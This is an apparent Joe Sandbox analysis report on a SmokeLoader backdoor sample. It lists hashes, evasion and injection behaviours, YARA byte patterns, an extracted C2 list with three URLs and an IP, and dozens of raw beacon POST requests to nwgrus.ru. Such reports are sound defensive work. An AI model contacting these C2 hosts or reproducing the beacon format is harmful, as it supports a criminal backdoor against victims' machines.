Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3sfCdeA1H2.exe

Overview

General Information

Sample name:3sfCdeA1H2.exe
renamed because original name is a hash value
Original sample name:91be25f31b7891908a50dfdc9f03f2b4.exe
Analysis ID:1533009
MD5:91be25f31b7891908a50dfdc9f03f2b4
SHA1:91db4bc09a4976db1b9922e09f2330b48ae50338
SHA256:422d2cea49b00fdc8b97b75b623006386426ec23637c53341e03d250e5ffe21b
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to read the PEB
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 3sfCdeA1H2.exe (PID: 6248 cmdline: "C:\Users\user\Desktop\3sfCdeA1H2.exe" MD5: 91BE25F31B7891908A50DFDC9F03F2B4)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • WerFault.exe (PID: 5828 cmdline: C:\Windows\system32\WerFault.exe -u -p 2580 -s 4964 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • tttcvva (PID: 6364 cmdline: C:\Users\user\AppData\Roaming\tttcvva MD5: 91BE25F31B7891908A50DFDC9F03F2B4)
  • explorer.exe (PID: 6160 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x3a5a:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 7 entries

      System Summary

      barindex
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\tttcvva, CommandLine: C:\Users\user\AppData\Roaming\tttcvva, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\tttcvva, NewProcessName: C:\Users\user\AppData\Roaming\tttcvva, OriginalFileName: C:\Users\user\AppData\Roaming\tttcvva, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\tttcvva, ProcessId: 6364, ProcessName: tttcvva
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-14T10:02:39.243661+020020391031A Network Trojan was detected192.168.2.449736109.175.29.3980TCP
      2024-10-14T10:02:40.058060+020020391031A Network Trojan was detected192.168.2.449737109.175.29.3980TCP
      2024-10-14T10:02:40.996326+020020391031A Network Trojan was detected192.168.2.449738109.175.29.3980TCP
      2024-10-14T10:02:41.831307+020020391031A Network Trojan was detected192.168.2.449739109.175.29.3980TCP
      2024-10-14T10:02:42.639282+020020391031A Network Trojan was detected192.168.2.449740109.175.29.3980TCP
      2024-10-14T10:02:43.565248+020020391031A Network Trojan was detected192.168.2.449741109.175.29.3980TCP
      2024-10-14T10:02:44.373465+020020391031A Network Trojan was detected192.168.2.449742109.175.29.3980TCP
      2024-10-14T10:02:45.214089+020020391031A Network Trojan was detected192.168.2.449743109.175.29.3980TCP
      2024-10-14T10:02:46.041902+020020391031A Network Trojan was detected192.168.2.449744109.175.29.3980TCP
      2024-10-14T10:02:47.033837+020020391031A Network Trojan was detected192.168.2.449745109.175.29.3980TCP
      2024-10-14T10:02:47.853497+020020391031A Network Trojan was detected192.168.2.449746109.175.29.3980TCP
      2024-10-14T10:02:48.657828+020020391031A Network Trojan was detected192.168.2.449747109.175.29.3980TCP
      2024-10-14T10:02:49.462699+020020391031A Network Trojan was detected192.168.2.449748109.175.29.3980TCP
      2024-10-14T10:02:50.282988+020020391031A Network Trojan was detected192.168.2.449749109.175.29.3980TCP
      2024-10-14T10:02:51.090176+020020391031A Network Trojan was detected192.168.2.449750109.175.29.3980TCP
      2024-10-14T10:02:51.895964+020020391031A Network Trojan was detected192.168.2.449751109.175.29.3980TCP
      2024-10-14T10:02:52.778542+020020391031A Network Trojan was detected192.168.2.449752109.175.29.3980TCP
      2024-10-14T10:02:53.595039+020020391031A Network Trojan was detected192.168.2.449753109.175.29.3980TCP
      2024-10-14T10:02:54.432535+020020391031A Network Trojan was detected192.168.2.449754109.175.29.3980TCP
      2024-10-14T10:02:55.356666+020020391031A Network Trojan was detected192.168.2.449755109.175.29.3980TCP
      2024-10-14T10:02:56.161080+020020391031A Network Trojan was detected192.168.2.449756109.175.29.3980TCP
      2024-10-14T10:02:56.967830+020020391031A Network Trojan was detected192.168.2.449757109.175.29.3980TCP
      2024-10-14T10:02:57.802218+020020391031A Network Trojan was detected192.168.2.449758109.175.29.3980TCP
      2024-10-14T10:02:58.603169+020020391031A Network Trojan was detected192.168.2.449759109.175.29.3980TCP
      2024-10-14T10:02:59.501084+020020391031A Network Trojan was detected192.168.2.449760109.175.29.3980TCP
      2024-10-14T10:03:00.325141+020020391031A Network Trojan was detected192.168.2.449761109.175.29.3980TCP
      2024-10-14T10:03:01.241528+020020391031A Network Trojan was detected192.168.2.449762109.175.29.3980TCP
      2024-10-14T10:03:02.205412+020020391031A Network Trojan was detected192.168.2.449763109.175.29.3980TCP
      2024-10-14T10:03:03.013839+020020391031A Network Trojan was detected192.168.2.449764109.175.29.3980TCP
      2024-10-14T10:03:03.820532+020020391031A Network Trojan was detected192.168.2.449765109.175.29.3980TCP
      2024-10-14T10:03:04.823196+020020391031A Network Trojan was detected192.168.2.449766109.175.29.3980TCP
      2024-10-14T10:03:05.614746+020020391031A Network Trojan was detected192.168.2.449767109.175.29.3980TCP
      2024-10-14T10:03:06.417805+020020391031A Network Trojan was detected192.168.2.449769109.175.29.3980TCP
      2024-10-14T10:03:07.311724+020020391031A Network Trojan was detected192.168.2.449770109.175.29.3980TCP
      2024-10-14T10:03:08.128601+020020391031A Network Trojan was detected192.168.2.449772109.175.29.3980TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
      Source: nwgrus.ruVirustotal: Detection: 12%Perma Link
      Source: http://nwgrus.ru/tmp/index.phpVirustotal: Detection: 16%Perma Link
      Source: C:\Users\user\AppData\Roaming\tttcvvaReversingLabs: Detection: 42%
      Source: C:\Users\user\AppData\Roaming\tttcvvaVirustotal: Detection: 38%Perma Link
      Source: 3sfCdeA1H2.exeReversingLabs: Detection: 42%
      Source: 3sfCdeA1H2.exeVirustotal: Detection: 38%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.8% probability
      Source: C:\Users\user\AppData\Roaming\tttcvvaJoe Sandbox ML: detected
      Source: 3sfCdeA1H2.exeJoe Sandbox ML: detected
      Source: 3sfCdeA1H2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\3sfCdeA1H2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49762 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49766 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49770 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49765 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49769 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 109.175.29.39:80
      Source: C:\Windows\explorer.exeNetwork Connect: 109.175.29.39 80Jump to behavior
      Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
      Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
      Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
      Source: Joe Sandbox ViewIP Address: 109.175.29.39 109.175.29.39
      Source: Joe Sandbox ViewASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fywxucdqvauxl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dfegowhoygianb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mxjkymtnwdus.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vsicdygcbqjjlt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mrabobimhfaodhs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hgmakgqsadecxk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vyvtnoktgixr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kpctqqwaapll.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwrjqoiyikclmp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://irqjlvxvguaa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://otrldmaxlwsqg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://axdumywgicw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drcsfcxotsike.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljowgttltjb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qqrvxoxcuflyv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bwkcgbjusdxgntcy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oivflmljlhkww.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ametqvtlvslgmj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iwhghyqwahgf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvmbuxbytsytdm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nnhkspmojwnsnbxu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yvnodxcwkvd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dgiwvsfymyh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wrjytrffmsivlanr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://estmwlacexvuyc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hvvqajwisec.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kctacxfnspruuv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ijnkeenpcqt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lnnfpwyulse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkoncbxvmuq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ievjgxgogeu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kavychcxkrxbq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nsmkoqlnxxds.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gljrhsxnugi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ublngteflakx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: nwgrus.ru
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
      Source: global trafficDNS traffic detected: DNS query: api.msn.com
      Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fywxucdqvauxl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r
